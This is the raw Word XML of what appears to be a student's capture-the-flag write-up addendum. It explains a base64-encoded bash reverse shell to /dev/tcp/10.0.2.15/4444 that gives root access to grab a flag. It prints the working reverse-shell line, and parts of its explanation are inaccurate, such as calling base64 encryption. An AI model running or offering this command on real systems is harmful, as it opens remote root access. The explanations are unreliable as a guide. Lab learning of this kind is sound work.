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4749" w14:textId="1C826EC7" w:rsidR="006B73B5" w:rsidRDefault="006B73B5">
      <w:r>
        <w:t>Addendum A:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E08A3B" w14:textId="27B015D7" w:rsidR="006B73B5" w:rsidRDefault="006B73B5">
      <w:r>
        <w:t xml:space="preserve">Bill </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>ask</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> me to review </w:t>
      </w:r>
      <w:r w:rsidR="00AF48D5">
        <w:t>the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20487394" w14:textId="1659105A" w:rsidR="008F7A7C" w:rsidRDefault="008F7A7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lets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break it down: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bash "-I&gt;&amp; /dev/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tcp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/10.0.2.15/4444 0&gt;&amp;1" | base64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29428E02" w14:textId="5B73C731" w:rsidR="00AF48D5" w:rsidRDefault="008F7A7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Here is how I broke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 down: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echo - repeats the result or what you have typed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 to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 command or string of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bash - Shell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"-I&gt;&amp; - not sure of the function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/dev/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tcp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/10.0.2.15/4444 - (to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make a remote connection to a device at a specific IP and port)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0&gt;&amp;1" - not sure of the function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| base64 - encrypts the entire string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482DDE57" w14:textId="5AA8D941" w:rsidR="008F7A7C" w:rsidRDefault="008F7A7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3D56418" w14:textId="790DEEDA" w:rsidR="008D0715" w:rsidRDefault="008F7A7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command gives you a resulting </w:t>
      </w:r>
      <w:r w:rsidR="003E361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encrypted base64 data string.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Since we are using ‘root’ privileges to execute the command </w:t>
      </w:r>
      <w:r w:rsidR="003E361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result is then run as </w:t>
      </w:r>
      <w:r w:rsidR="00AE0F42">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="1D1C1D"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t>root and</w:t>
      </w:r>
      <w:r w:rsidR="003E361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8D0715"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creates</w:t>
      </w:r>
      <w:r w:rsidR="003E361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the additional</w:t>
      </w:r>
      <w:r w:rsidR="008D071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reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1C7707" w14:textId="5B97C0C8" w:rsidR="008F7A7C" w:rsidRPr="008D0715" w:rsidRDefault="008D071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This allows</w:t>
      </w:r>
      <w:r w:rsidR="00AE0F4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us to connect as root in this new shell and collect the remaining flag. If you where </w:t>
      </w:r>
      <w:r w:rsidR="0035522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trying to do anything else in this shell it would allow since you are root you could create a new user, change a password, or any other </w:t>
      </w:r>
      <w:r w:rsidR="00D97BC1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="1D1C1D"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t>command that you would like since you are root.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="008F7A7C" w:rsidRPr="008D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B5"/>
    <w:rsid w:val="00355220"/>
    <w:rsid w:val="003E3617"/>
    <w:rsid w:val="006B73B5"/>
    <w:rsid w:val="008D0715"/>
    <w:rsid w:val="008F7A7C"/>
    <w:rsid w:val="00AE0F42"/>
    <w:rsid w:val="00AF48D5"/>
    <w:rsid w:val="00D9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5044"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{24EDE825-4517-46AA-B38E-AF47B6E2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Carter</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>William Carter</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-12-08T15:12:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-12-08T15:50:00Z</dcterms:modified>
</cp:coreProperties>
</file>